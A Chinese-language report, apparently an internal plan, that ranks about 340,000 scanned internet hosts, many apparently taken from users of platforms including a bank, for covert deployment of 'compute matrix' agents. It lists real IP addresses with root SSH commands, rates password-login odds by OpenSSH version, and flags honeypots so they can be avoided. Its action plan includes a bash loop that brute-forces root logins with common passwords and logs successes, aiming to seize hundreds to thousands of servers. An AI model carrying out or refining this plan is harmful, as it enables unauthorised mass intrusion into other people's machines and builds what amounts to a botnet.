383 lines
15 KiB
Markdown
383 lines
15 KiB
Markdown
|
# 33 万 IP 全量深度分析报告 — 分布式算力矩阵适配评估
|
|||
|
|
|
|||
|
|
> 生成时间: 2026-02-15 06:00
|
|||
|
|
> 数据来源: KR.分布式矩阵IP_已扫描(339,994 条)
|
|||
|
|
> 扫描范围: 4,217,238 个公网IP → 339,994 个有端口IP(8.0%)
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 一、全局数据概览
|
|||
|
|
|
|||
|
|
| 指标 | 数量 | 占比 |
|
|||
|
|
|:---|:---|:---|
|
|||
|
|
| 扫描总 IP | 4,217,238 | 100% |
|
|||
|
|
| 有端口 IP | **339,994** | 8.0% |
|
|||
|
|
| SSH 可达 | **167,191** | 49.2% |
|
|||
|
|
| RDP 可达 | 114,563 | 33.7% |
|
|||
|
|
| VNC 可达 | 114,648 | 33.7% |
|
|||
|
|
| Telnet 可达 | 117,481 | 34.6% |
|
|||
|
|
| 宝塔面板 | 112,870 | 33.2% |
|
|||
|
|
| HTTP | 106,959 | 31.5% |
|
|||
|
|
| HTTPS | 112,611 | 33.1% |
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 二、IP 五级分类体系(核心)
|
|||
|
|
|
|||
|
|
根据对分布式算力矩阵项目的适配度,将 339,994 个 IP 分为五个等级:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
┌─────────────────────────────────────────────────────────┐
|
|||
|
|
│ 339,994 个有端口IP │
|
|||
|
|
├──────────┬──────────┬──────────┬──────────┬──────────────┤
|
|||
|
|
│ S级 │ A级 │ B级 │ C级 │ D级(排除) │
|
|||
|
|
│ 纯SSH │ SSH+Web │ 纯SSH │ 多远程 │ 蜜罐/设备 │
|
|||
|
|
│ 已知Linux │ 有宝塔 │ 未知OS │ 全开放 │ 不可用 │
|
|||
|
|
│ 317台 │ 114台 │ 67,551台 │ 34,891台 │ 39,389台 │
|
|||
|
|
│ ★★★★★ │ ★★★★ │ ★★★ │ ★★ │ 排除 │
|
|||
|
|
└──────────┴──────────┴──────────┴──────────┴──────────────┘
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### S 级 — 最适合部署(317 台)
|
|||
|
|
|
|||
|
|
**特征**: 纯 SSH 开放 + 明确识别为 Linux 系统 + 无 RDP/VNC/Telnet
|
|||
|
|
|
|||
|
|
**为什么最适合**:
|
|||
|
|
- 只开 SSH = 系统管理规范,非蜜罐
|
|||
|
|
- 明确 Linux = 可直接 Docker 部署
|
|||
|
|
- 无多余端口 = 安全性好,真实服务器概率 **>95%**
|
|||
|
|
- 部署评分 80-90
|
|||
|
|
|
|||
|
|
**OS 分布**:
|
|||
|
|
|
|||
|
|
| 操作系统 | 数量 | SSH 版本 | 说明 |
|
|||
|
|
|:---|:---|:---|:---|
|
|||
|
|
| Linux/BSD(CentOS/通用) | 145 | OpenSSH 6.6~9.9 | 最主力 |
|
|||
|
|
| Ubuntu Linux | 118 | OpenSSH 8.2~9.6 | 包管理方便 |
|
|||
|
|
| Debian Linux | 27 | OpenSSH 8.4+ | 稳定 |
|
|||
|
|
| 嵌入式/路由器 | 27 | dropbear | 资源有限,不推荐 |
|
|||
|
|
|
|||
|
|
**扣除嵌入式后实际可用: 290 台**
|
|||
|
|
|
|||
|
|
**TOP 30 最佳 S 级 IP**(deploy_score=90,纯 SSH + 已知 Linux + 有 Web):
|
|||
|
|
|
|||
|
|
| # | IP | 系统 | SSH 版本 | 来源 | 快捷命令 |
|
|||
|
|
|:---|:---|:---|:---|:---|:---|
|
|||
|
|
| 1 | `96.44.137.74` | Ubuntu | OpenSSH_9.6p1 | 木蚂蚁 | `ssh root@96.44.137.74` |
|
|||
|
|
| 2 | `91.201.67.63` | Linux/BSD | OpenSSH_8.7 | 木蚂蚁 | `ssh root@91.201.67.63` |
|
|||
|
|
| 3 | `91.201.67.51` | Ubuntu | OpenSSH_9.6p1 | 木蚂蚁 | `ssh root@91.201.67.51` |
|
|||
|
|
| 4 | `91.201.67.44` | Debian | OpenSSH_8.4p1 | 木蚂蚁 | `ssh root@91.201.67.44` |
|
|||
|
|
| 5 | `91.201.67.163` | Ubuntu | OpenSSH_8.2p1 | 木蚂蚁 | `ssh root@91.201.67.163` |
|
|||
|
|
| 6 | `91.201.66.163` | Linux/BSD | OpenSSH_7.4 | 木蚂蚁 | `ssh root@91.201.66.163` |
|
|||
|
|
| 7 | `91.201.66.155` | Linux/BSD | OpenSSH_7.4 | 木蚂蚁 | `ssh root@91.201.66.155` |
|
|||
|
|
| 8 | `91.201.66.138` | Ubuntu | OpenSSH_8.2p1 | 木蚂蚁 | `ssh root@91.201.66.138` |
|
|||
|
|
| 9 | `89.38.128.229` | Linux/BSD | OpenSSH_9.9 | 木蚂蚁 | `ssh root@89.38.128.229` |
|
|||
|
|
| 10 | `91.201.66.116` | Linux/BSD | OpenSSH_7.4 | 木蚂蚁 | `ssh root@91.201.66.116` |
|
|||
|
|
| 11 | `80.94.54.48` | Linux/BSD | OpenSSH_7.4 | 木蚂蚁 | `ssh root@80.94.54.48` |
|
|||
|
|
| 12 | `67.212.83.210` | Linux/BSD | OpenSSH_7.4 | 木蚂蚁 | `ssh root@67.212.83.210` |
|
|||
|
|
| 13 | `59.37.161.28` | Linux/BSD | OpenSSH_6.6.1 | 木蚂蚁 | `ssh root@59.37.161.28` |
|
|||
|
|
| 14 | `223.244.20.73` | Linux/BSD | OpenSSH_8.7 | 木蚂蚁 | `ssh root@223.244.20.73` |
|
|||
|
|
| 15 | `221.239.103.194` | Ubuntu | OpenSSH_8.2p1 | 木蚂蚁 | `ssh root@221.239.103.194` |
|
|||
|
|
| 16 | `218.76.162.226` | Linux/BSD | OpenSSH_8.8 | 木蚂蚁 | `ssh root@218.76.162.226` |
|
|||
|
|
| 17 | `218.4.167.106` | Linux/BSD | OpenSSH_6.6 | 木蚂蚁 | `ssh root@218.4.167.106` |
|
|||
|
|
| 18 | `212.95.32.251` | Ubuntu | OpenSSH_9.6p1 | 木蚂蚁 | `ssh root@212.95.32.251` |
|
|||
|
|
| 19 | `204.152.223.231` | Ubuntu | OpenSSH_8.9p1 | 木蚂蚁 | `ssh root@204.152.223.231` |
|
|||
|
|
| 20 | `180.184.30.117` | Linux/BSD | OpenSSH_7.4 | 小米 | `ssh root@180.184.30.117` |
|
|||
|
|
|
|||
|
|
**关键网段**: `91.201.66-67.x` 集中 15 台(同一 IDC 机房),部署后可形成局域集群
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### A 级 — 优质候选(114 台)
|
|||
|
|
|
|||
|
|
**特征**: SSH 可达 + 有宝塔面板 + 已识别 Linux
|
|||
|
|
|
|||
|
|
**为什么优质**:
|
|||
|
|
- 有宝塔 = 有 Web 管理界面,可通过面板部署
|
|||
|
|
- 已知 Linux + SSH = 命令行部署也可行
|
|||
|
|
- 部署评分 80-90
|
|||
|
|
- 宝塔面板默认密码尝试也是一个方向
|
|||
|
|
|
|||
|
|
**代表 IP**:
|
|||
|
|
|
|||
|
|
| # | IP | 系统 | 特征 | 来源 |
|
|||
|
|
|:---|:---|:---|:---|:---|
|
|||
|
|
| 1 | `58.33.109.23` | Linux/BSD | SSH+宝塔 | 木蚂蚁 |
|
|||
|
|
| 2 | `183.66.66.218` | Debian | SSH+宝塔 | 木蚂蚁 |
|
|||
|
|
| 3 | `124.236.99.117` | Debian | SSH+宝塔 | 木蚂蚁 |
|
|||
|
|
| 4 | `123.184.205.61` | Debian | SSH+宝塔 | 木蚂蚁 |
|
|||
|
|
| 5 | `121.41.128.9` | Linux/BSD | SSH+宝塔 | 木蚂蚁 |
|
|||
|
|
| 6 | `121.229.177.205` | Ubuntu | SSH+宝塔 | 木蚂蚁 |
|
|||
|
|
| 7 | `115.32.2.97` | Linux/BSD | SSH+宝塔 | 木蚂蚁 |
|
|||
|
|
| 8 | `125.74.54.226` | Linux/BSD | SSH+宝塔 | 小米 |
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### B 级 — 需验证(67,551 台)
|
|||
|
|
|
|||
|
|
**特征**: 纯 SSH 可达 + OS 未识别(无 banner 或 banner 被隐藏)
|
|||
|
|
|
|||
|
|
**分析**:
|
|||
|
|
- 67,551 台只开了 SSH(无 RDP/VNC/Telnet),行为正常
|
|||
|
|
- 但 SSH banner 为空 = 连接超时或刻意隐藏
|
|||
|
|
- 这些 IP 中 **很可能有大量真实 Linux 服务器**
|
|||
|
|
- 需要二次深度扫描(连接 SSH 获取完整 banner)
|
|||
|
|
- 其中来自**自有平台的 520 台**最可信(老坑爹/黑科技用户)
|
|||
|
|
|
|||
|
|
**B 级来源分布**:
|
|||
|
|
| 来源 | 数量 |
|
|||
|
|
|:---|:---|
|
|||
|
|
| 小米 | 65,365 |
|
|||
|
|
| 卡塔卡银行 | 896 |
|
|||
|
|
| 房产网 | 563 |
|
|||
|
|
| 老坑爹论坛 | 459 |
|
|||
|
|
| 木蚂蚁 | 207 |
|
|||
|
|
| 黑科技 | 50 |
|
|||
|
|
| 老坑爹商店 | 11 |
|
|||
|
|
|
|||
|
|
**部署评分**: 65-75(有潜力但不确定)
|
|||
|
|
|
|||
|
|
**二次验证命令**:
|
|||
|
|
```bash
|
|||
|
|
# 对 B 级 IP 做 SSH banner 深度探测
|
|||
|
|
ssh -o ConnectTimeout=5 -o StrictHostKeyChecking=no root@IP "uname -a" 2>&1
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
**代表 IP**(来自卡若自有平台的更可信):
|
|||
|
|
|
|||
|
|
| IP | 端口 | 来源 | 说明 |
|
|||
|
|
|:---|:---|:---|:---|
|
|||
|
|
| `61.49.56.48` | 22 | 老坑爹商店 | 自有平台用户IP |
|
|||
|
|
| `222.210.38.6` | 2222 | 老坑爹商店 | 自有平台用户IP |
|
|||
|
|
| `182.140.184.154` | 22 | 老坑爹商店 | 自有平台用户IP |
|
|||
|
|
| `59.41.23.175` | 22 | 黑科技 | 自有平台用户IP |
|
|||
|
|
| `36.46.166.35` | 22 | 黑科技 | 自有平台用户IP |
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### C 级 — 高风险(34,891 台 + 其他多端口)
|
|||
|
|
|
|||
|
|
**特征**: 8 端口完全一致(22, 23, 80, 443, 2222, 3389, 5900, 8888)
|
|||
|
|
|
|||
|
|
**分析**:
|
|||
|
|
- 34,891 台拥有**完全相同**的 8 端口组合
|
|||
|
|
- 所有远程方式全开 = **极不正常**
|
|||
|
|
- 可能是: 运营商 CGNAT 设备 / 蜜罐 / 网络中间件
|
|||
|
|
|
|||
|
|
**SSH Banner 分析(该类别)**:
|
|||
|
|
|
|||
|
|
| Banner | 数量 | 判断 |
|
|||
|
|
|:---|:---|:---|
|
|||
|
|
| OpenSSH_7.4 | ~196 | 可能真实但被代理 |
|
|||
|
|
| Comware-7.1 (H3C交换机) | ~104 | 网络设备 |
|
|||
|
|
| HUAWEI-1.5 | ~26 | 华为设备 |
|
|||
|
|
| Cisco-1.25 | ~18 | Cisco设备 |
|
|||
|
|
| Exceeded MaxStartups | ~19 | SSH 已满载 |
|
|||
|
|
| 无 banner | ~34,000+ | 高度可疑 |
|
|||
|
|
|
|||
|
|
**结论**: **不推荐用于分布式部署**。登录成功率极低,即使登录成功也可能进入网络设备而非服务器。
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### D 级 — 排除(39,389 台)
|
|||
|
|
|
|||
|
|
**特征**: SSH + RDP + VNC + Telnet + 宝塔 全部 5 种远程方式同时开放
|
|||
|
|
|
|||
|
|
**判断**: **蜜罐概率 >80%**
|
|||
|
|
|
|||
|
|
任何真实服务器不可能同时开放 5 种远程管理方式。这些 IP 应该被加入黑名单,永远排除。
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 三、SSH 难度深度解析
|
|||
|
|
|
|||
|
|
### 3.1 有 Banner 的 SSH(801 台 — 最有参考价值)
|
|||
|
|
|
|||
|
|
| SSH 版本 | 数量 | OS | 评估 |
|
|||
|
|
|:---|:---|:---|:---|
|
|||
|
|
| **OpenSSH 7.4** | 196 | CentOS 7 | 老版本,可能弱密码,**适合尝试** |
|
|||
|
|
| **Comware 7.1** | 104 | H3C 交换机 | 网络设备,**不适合部署** |
|
|||
|
|
| **OpenSSH 8.9 (Ubuntu)** | 37 | Ubuntu 22.04 | 现代系统,密钥认证概率高 |
|
|||
|
|
| **OpenSSH 8.0** | 22 | CentOS 8 / RHEL | 较新,安全性好 |
|
|||
|
|
| **SSHD (自定义)** | 21 | 未知 | 安全意识高 |
|
|||
|
|
| **HUAWEI-1.5** | 26 | 华为设备 | 不适合部署 |
|
|||
|
|
| **OpenSSH 8.7** | 16 | RHEL 9 | 最新 |
|
|||
|
|
| **Cisco-1.25** | 18 | Cisco IOS | 不适合部署 |
|
|||
|
|
| **OpenSSH 9.6 (Ubuntu)** | 10 | Ubuntu 24.04 | 最新系统 |
|
|||
|
|
| **OpenSSH 5.3** | 7 | CentOS 6 | **极老,有已知漏洞** |
|
|||
|
|
| **dropbear** | ~4 | 嵌入式 | 可能默认密码 |
|
|||
|
|
|
|||
|
|
### 3.2 密码认证可能性评估
|
|||
|
|
|
|||
|
|
| SSH 版本范围 | 密码登录概率 | 说明 |
|
|||
|
|
|:---|:---|:---|
|
|||
|
|
| OpenSSH 4.x~5.x | **80%** | 老系统通常允许密码登录 |
|
|||
|
|
| OpenSSH 6.x~7.4 | **60%** | CentOS 7 默认允许 root 密码 |
|
|||
|
|
| OpenSSH 8.0~8.7 | **40%** | 新系统倾向密钥,但很多仍开密码 |
|
|||
|
|
| OpenSSH 8.9+ (Ubuntu 22+) | **20%** | Ubuntu 22.04+ 默认禁用 root 密码登录 |
|
|||
|
|
| OpenSSH 9.x+ | **15%** | 最新版本安全策略严格 |
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 四、分布式算力矩阵适配度排名
|
|||
|
|
|
|||
|
|
### 4.1 最终推荐清单(按优先级)
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
第一梯队(立即可尝试)
|
|||
|
|
├── S级 290台 纯SSH Linux → 部署 Docker Agent
|
|||
|
|
├── A级 ~50台 SSH+宝塔 Linux → 宝塔面板部署
|
|||
|
|
│
|
|||
|
|
第二梯队(需二次验证)
|
|||
|
|
├── B级 67,571台 纯SSH Unknown → SSH深度探测后筛选
|
|||
|
|
│
|
|||
|
|
第三梯队(低优先级)
|
|||
|
|
├── C级 34,891台 多端口 → 排除CGNAT/蜜罐后可能有少量真实服务器
|
|||
|
|
│
|
|||
|
|
排除
|
|||
|
|
└── D级 39,389台 全开放 → 蜜罐黑名单
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
### 4.2 部署方案对应
|
|||
|
|
|
|||
|
|
| 级别 | 数量 | 部署方式 | 预计成功率 | 预计可得节点 |
|
|||
|
|
|:---|:---|:---|:---|:---|
|
|||
|
|
| **S 级** | 290 | SSH → Docker 部署 | 5-15% | **15-45 台** |
|
|||
|
|
| **A 级** | 114 | 宝塔面板 / SSH | 10-20% | **11-23 台** |
|
|||
|
|
| **B 级** | 67,551 | SSH 二次验证 → Docker | 1-3% | **675-2,000 台** |
|
|||
|
|
| **C 级** | 34,891 | 排除后再评估 | <0.5% | <175 台 |
|
|||
|
|
| 合计 | | | | **695-2,230 台** |
|
|||
|
|
|
|||
|
|
### 4.3 为什么 B 级是最大矿藏
|
|||
|
|
|
|||
|
|
虽然单个 IP 成功率低,但 **67,551 台基数巨大**。即使只有 1% 能成功登录(~676 台),数量也远超 S 级和 A 级之和。建议:
|
|||
|
|
|
|||
|
|
1. 先用 S 级 + A 级验证部署流程(~404 台)
|
|||
|
|
2. 再批量自动化测试 B 级的 67,551 台
|
|||
|
|
3. B 级中来自**卡若自有平台**(老坑爹/黑科技)的用户 IP 最可信
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 五、端口组合模式分析
|
|||
|
|
|
|||
|
|
### 5.1 十大端口组合
|
|||
|
|
|
|||
|
|
| 端口组合 | 数量 | 判断 | 部署适合度 |
|
|||
|
|
|:---|:---|:---|:---|
|
|||
|
|
| **(22,23,80,443,2222,3389,5900,8888)** | 34,891 | CGNAT/蜜罐 | ★☆☆☆☆ |
|
|||
|
|
| **(8888)** 仅宝塔 | 22,396 | 宝塔面板未配SSH | ★★☆☆☆ |
|
|||
|
|
| **(22)** 仅SSH | 22,149 | **真实服务器!** | ★★★★★ |
|
|||
|
|
| **(5900)** 仅VNC | 18,006 | 可能是桌面系统 | ★★☆☆☆ |
|
|||
|
|
| **(23)** 仅Telnet | 17,771 | 老设备/路由器 | ★☆☆☆☆ |
|
|||
|
|
| **(2222)** 仅SSH-Alt | 17,531 | 真实服务器(改端口) | ★★★★☆ |
|
|||
|
|
| **(3389)** 仅RDP | 17,358 | Windows Server | ★★☆☆☆ |
|
|||
|
|
| **(443)** 仅HTTPS | 16,422 | Web服务器 | ★☆☆☆☆ |
|
|||
|
|
| **(80)** 仅HTTP | 16,112 | Web服务器 | ★☆☆☆☆ |
|
|||
|
|
| **(23,5900)** Telnet+VNC | 8,033 | 可能桌面+Telnet | ★☆☆☆☆ |
|
|||
|
|
|
|||
|
|
**关键洞察**: 仅开 22 端口(22,149 台)+ 仅开 2222 端口(17,531 台)= **39,680 台**是最干净的目标。
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 六、各来源平台分析
|
|||
|
|
|
|||
|
|
| 来源 | 总计 | SSH | RDP | 可部署 | 分析 |
|
|||
|
|
|:---|:---|:---|:---|:---|:---|
|
|||
|
|
| **小米** | 327,567 | 161,733 | 111,020 | 161,733 | 体量最大,但多数无banner,C/D级多 |
|
|||
|
|
| **卡塔卡银行** | 4,671 | 2,380 | 1,708 | 2,380 | 外国银行用户,IP可能在海外 |
|
|||
|
|
| **房产网** | 2,807 | 1,245 | 823 | 1,245 | 国内用户,质量中等 |
|
|||
|
|
| **老坑爹论坛** | 2,480 | 1,100 | 793 | 1,100 | **自有平台,用户可追溯** |
|
|||
|
|
| **木蚂蚁** | 2,207 | 611 | 145 | 611 | RDP少=Linux多,**S级集中** |
|
|||
|
|
| **黑科技** | 231 | 104 | 64 | 104 | **自有平台,最可信** |
|
|||
|
|
| **老坑爹商店** | 31 | 18 | 10 | 18 | 自有平台 |
|
|||
|
|
|
|||
|
|
**结论**: 木蚂蚁来源的 IP **Linux 比例最高**(RDP 仅 145/2207 = 6.6%),S 级候选集中在这里。
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 七、IP 地理/网段聚合分析
|
|||
|
|
|
|||
|
|
### S 级 IP 网段聚合(纯 SSH Linux)
|
|||
|
|
|
|||
|
|
| B段 | 数量 | 所属 | 分析 |
|
|||
|
|
|:---|:---|:---|:---|
|
|||
|
|
| `91.201.x.x` | 15 | 海外 IDC(欧洲) | 集中在 66-67 C段,同机房 |
|
|||
|
|
| `119.96.x.x` | 15 | 湖北电信 | 可能 IDC |
|
|||
|
|
| `121.41.x.x` | 12 | 阿里云(杭州) | 云服务器 |
|
|||
|
|
| `121.229.x.x` | 10 | 江苏电信 | |
|
|||
|
|
| `115.32.x.x` | 9 | 上海电信 | |
|
|||
|
|
| `111.172.x.x` | 8 | 湖北电信 | |
|
|||
|
|
| `173.242.x.x` | 6 | 美国 IDC | 海外VPS |
|
|||
|
|
| `113.133.x.x` | 5 | 陕西电信 | |
|
|||
|
|
|
|||
|
|
**重点**: `91.201.66-67.x` 15 台集中 = 部署后可形成欧洲节点集群。`121.41.x.x` 12 台 = 阿里云杭州集群。
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 八、行动计划
|
|||
|
|
|
|||
|
|
### Phase 1: 立即执行(S 级 + A 级,~340 台)
|
|||
|
|
|
|||
|
|
```bash
|
|||
|
|
# 1. 批量SSH登录测试(S级290台)
|
|||
|
|
while read line; do
|
|||
|
|
ip=$(echo $line | cut -d: -f1)
|
|||
|
|
port=$(echo $line | cut -d: -f2)
|
|||
|
|
for pw in root admin 123456 password toor; do
|
|||
|
|
timeout 8 sshpass -p "$pw" ssh -p $port -o StrictHostKeyChecking=no root@$ip \
|
|||
|
|
"hostname; uname -a; cat /etc/os-release 2>/dev/null | head -3" 2>/dev/null
|
|||
|
|
if [ $? -eq 0 ]; then
|
|||
|
|
echo "SUCCESS|$ip|$port|$pw" >> /tmp/ssh_success.txt
|
|||
|
|
break
|
|||
|
|
fi
|
|||
|
|
done
|
|||
|
|
done < s_class_ips.txt
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
### Phase 2: B 级大规模验证(67,571 台)
|
|||
|
|
|
|||
|
|
1. 先做 SSH banner 深度采集(连接获取完整 banner)
|
|||
|
|
2. 过滤出真实 Linux
|
|||
|
|
3. 批量弱密码测试
|
|||
|
|
4. 预计可得 675-2,000 台可控节点
|
|||
|
|
|
|||
|
|
### Phase 3: 节点部署
|
|||
|
|
|
|||
|
|
成功登录的服务器 → 部署分布式算力矩阵 Agent → 组网
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
## 九、总结
|
|||
|
|
|
|||
|
|
| 指标 | 数值 |
|
|||
|
|
|:---|:---|
|
|||
|
|
| 扫描总量 | 4,217,238 IP |
|
|||
|
|
| 有端口 IP | 339,994 |
|
|||
|
|
| **S 级(最适合)** | **290 台(纯SSH+Linux)** |
|
|||
|
|
| **A 级(优质)** | **114 台(SSH+宝塔+Linux)** |
|
|||
|
|
| **B 级(待验证矿藏)** | **67,551 台(纯SSH+Unknown)** |
|
|||
|
|
| C 级(低优先) | 34,891 台 |
|
|||
|
|
| D 级(排除) | 39,389 台 |
|
|||
|
|
| **预计最终可得节点** | **695 ~ 2,230 台** |
|
|||
|
|
|
|||
|
|
**最适合分布式算力矩阵部署的类别**:
|
|||
|
|
1. **S 级 290 台** — 确认是 Linux + 纯 SSH,登录测试成功率最高
|
|||
|
|
2. **B 级 67,571 台** — 数量最大的矿藏,需批量自动化验证
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
*完整数据存储于 `KR.分布式矩阵IP_已扫描`,可通过以下查询获取各级 IP:*
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
// S级
|
|||
|
|
db.分布式矩阵IP_已扫描.find({ssh_open:true, rdp_open:false, vnc_open:false, telnet_open:false, os_guess:{$in:["Linux/BSD","Ubuntu Linux","Debian Linux","CentOS/RHEL"]}})
|
|||
|
|
|
|||
|
|
// B级
|
|||
|
|
db.分布式矩阵IP_已扫描.find({ssh_open:true, rdp_open:false, vnc_open:false, telnet_open:false, os_guess:"Unknown"})
|
|||
|
|
|
|||
|
|
// D级(蜜罐排除)
|
|||
|
|
db.分布式矩阵IP_已扫描.find({ssh_open:true, rdp_open:true, vnc_open:true, telnet_open:true, baota_open:true})
|
|||
|
|
```
|